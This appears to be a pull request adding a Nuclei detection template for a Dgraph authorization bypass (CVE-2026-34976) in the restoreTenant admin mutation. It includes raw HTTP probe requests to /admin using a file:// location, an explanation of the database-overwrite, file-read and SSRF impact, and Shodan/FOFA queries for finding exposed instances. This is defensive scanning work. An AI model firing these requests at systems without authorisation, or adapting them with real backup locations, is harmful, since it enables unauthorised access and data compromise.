### PR TITLE
Add CVE-2026-34976 Dgraph restoreTenant authorization bypass

### DIFF
--- a/http/cves/2026/CVE-2026-34976.yaml
+++ b/http/cves/2026/CVE-2026-34976.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-34976
+
+info:
+  name: Dgraph - restoreTenant Admin Mutation Missing Authorization
+  author: str4k3r
+  severity: critical
+  description: |
+    Every Dgraph admin GraphQL mutation is wired to authorization middleware
+    in adminMutationMWConfig (admin.go) except restoreTenant. The similar
+    restore mutation is protected by gogMutMWs (Guardian-of-Galaxy auth + IP
+    whitelist + audit logging); restoreTenant is absent from that map, so its
+    middleware lookup returns nil and the resolver executes with zero access
+    control. restoreTenant accepts an attacker-controlled backup location
+    (including file:// for local filesystem access, or an S3/MinIO endpoint),
+    letting an unauthenticated caller overwrite the database, read
+    server-side files, or trigger SSRF. Fixed by adding "restoreTenant":
+    gogMutMWs to adminMutationMWConfig, giving it the same protection as
+    restore. This template is self-contained and does not touch any real
+    data: it points both restore and restoreTenant at a guaranteed-
+    nonexistent local path so neither mutation can succeed even if reached,
+    then compares their responses. It only flags a target where restore is
+    demonstrably protected (blocked by IP whitelist or Guardian-of-Galaxy
+    auth) yet restoreTenant on the same target is not - the specific
+    marginal exposure this CVE introduces - so it does not false-positive on
+    a target with no admin protection configured at all, and does not
+    require any operator-supplied target-specific value.
+  reference:
+    - https://github.com/hypermodeinc/dgraph/security/advisories/GHSA-p5rh-vmhp-gvcw
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34976
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-34976
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: hypermodeinc
+    product: dgraph
+  tags: cve,cve2026,dgraph,authbypass,unauth,ssrf
+
+http:
+  - raw:
+      - |
+        POST /admin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"query": "mutation { restore(input: { location: \"file:///nonexistent-cve-34976-probe/\" }) { code message } }"}
+
+      - |
+        POST /admin HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"query": "mutation { restoreTenant(input: { restoreInput: { location: \"file:///nonexistent-cve-34976-probe/\" }, fromNamespace: 0 }) { code message } }"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - "unauthorized ip address"
+      - type: word
+        part: body_2
+        words:
+          - "unauthorized ip address"
+        negative: true
+      - type: word
+        part: body_2
+        words:
+          - "restoreTenant"

--- a/http/cves/2026/CVE-2026-34976.yaml
+++ b/http/cves/2026/CVE-2026-34976.yaml
@@ -1,29 +1,15 @@
 id: CVE-2026-34976
 
 info:
-  name: Dgraph - restoreTenant Admin Mutation Missing Authorization
+  name: Dgraph <=v25.3.0 - Admin Mutation Missing Authorization
   author: str4k3r
   severity: critical
   description: |
-    Every Dgraph admin GraphQL mutation is wired to authorization middleware
-    in adminMutationMWConfig (admin.go) except restoreTenant. The similar
-    restore mutation is protected by gogMutMWs (Guardian-of-Galaxy auth + IP
-    whitelist + audit logging); restoreTenant is absent from that map, so its
-    middleware lookup returns nil and the resolver executes with zero access
-    control. restoreTenant accepts an attacker-controlled backup location
-    (including file:// for local filesystem access, or an S3/MinIO endpoint),
-    letting an unauthenticated caller overwrite the database, read
-    server-side files, or trigger SSRF. Fixed by adding "restoreTenant":
-    gogMutMWs to adminMutationMWConfig, giving it the same protection as
-    restore. This template is self-contained and does not touch any real
-    data: it points both restore and restoreTenant at a guaranteed-
-    nonexistent local path so neither mutation can succeed even if reached,
-    then compares their responses. It only flags a target where restore is
-    demonstrably protected (blocked by IP whitelist or Guardian-of-Galaxy
-    auth) yet restoreTenant on the same target is not - the specific
-    marginal exposure this CVE introduces - so it does not false-positive on
-    a target with no admin protection configured at all, and does not
-    require any operator-supplied target-specific value.
+    Dgraph <=v25.3.0 contains an authentication bypass caused by missing authorization middleware for the restoreTenant admin mutation, letting unauthenticated attackers overwrite the database, read files, and perform SSRF, exploit requires no authentication.
+  impact: |
+    Unauthenticated attackers can overwrite the database, read server files, and perform SSRF, leading to full data compromise and server access.
+  remediation: |
+    Update to version 25.3.1 or later.
   reference:
     - https://github.com/hypermodeinc/dgraph/security/advisories/GHSA-p5rh-vmhp-gvcw
     - https://nvd.nist.gov/vuln/detail/CVE-2026-34976
@@ -34,12 +20,32 @@ info:
     cwe-id: CWE-862
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     vendor: hypermodeinc
     product: dgraph
-  tags: cve,cve2026,dgraph,authbypass,unauth,ssrf
+    shodan-query: title:"Dgraph"
+    fofa-query: body="dgraph"
+  tags: cve,cve2026,dgraph,auth-bypass,ssrf
+
+flow: http(1) && http(2) && http(3)
 
 http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 3
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(body, "dgraph", "Dgraph")'
+        condition: and
+        internal: true
+
   - raw:
       - |
         POST /admin HTTP/1.1
@@ -48,6 +54,15 @@ http:
 
         {"query": "mutation { restore(input: { location: \"file:///nonexistent-cve-34976-probe/\" }) { code message } }"}
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "unauthorized ip address")'
+        condition: and
+        internal: true
+
+  - raw:
       - |
         POST /admin HTTP/1.1
         Host: {{Hostname}}
@@ -55,18 +70,10 @@ http:
 
         {"query": "mutation { restoreTenant(input: { restoreInput: { location: \"file:///nonexistent-cve-34976-probe/\" }, fromNamespace: 0 }) { code message } }"}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body_1
-        words:
-          - "unauthorized ip address"
-      - type: word
-        part: body_2
-        words:
-          - "unauthorized ip address"
-        negative: true
-      - type: word
-        part: body_2
-        words:
-          - "restoreTenant"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "restoreTenant")'
+          - '!contains(body, "unauthorized ip address")'
+        condition: and


### PR DESCRIPTION
## Vulnerability
Dgraph 25.3.0 protects the `restore` admin mutation but omits the equivalent `restoreTenant` mutation from the same authorization middleware. Dgraph 25.3.1 applies the admin check consistently.

## Template behavior
The template sends a harmless restore request and a matching restoreTenant request against a guaranteed nonexistent file URI, then compares authorization errors. It does not restore real data.

## Required configuration
Run against a Dgraph deployment with admin/Guardian protection enabled and use a nonexistent file URI for the probe. The endpoint must be reachable from the authorized test network.

## Impact
An unauthorized caller may trigger tenant restore operations, causing data exposure, overwrite, or denial of service depending on the deployment.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-34976.yaml
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
